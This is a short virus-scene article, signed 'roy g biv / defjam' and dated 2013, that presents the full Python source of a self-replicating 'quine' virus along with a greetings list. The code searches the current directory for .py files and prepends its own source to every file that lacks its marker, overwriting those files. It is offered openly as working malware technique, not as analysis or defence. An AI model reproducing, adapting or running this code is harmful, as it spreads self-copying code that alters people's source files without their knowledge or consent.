﻿                            Quine Viruses in Python
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

a=""                                            #place atoi(code,16) here first, begin with second '"'
b='a="'+a                                       #create string declaration and append atoi entire code
c=range(0,a.__len__(),2)
for d in c:b=b+chr(int(a[d:d+2],16))            #append plaintext code
import glob
a=glob.glob("*.[pP][yY]")                       #find all .py files
for c in a:
 d=open(c).read()                               #read entire file
 if d.find("Quine")<0:e=open(c,"w").write(b+d)  #if uninfected, write everything
#Quine - roy g biv 07/09/13


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
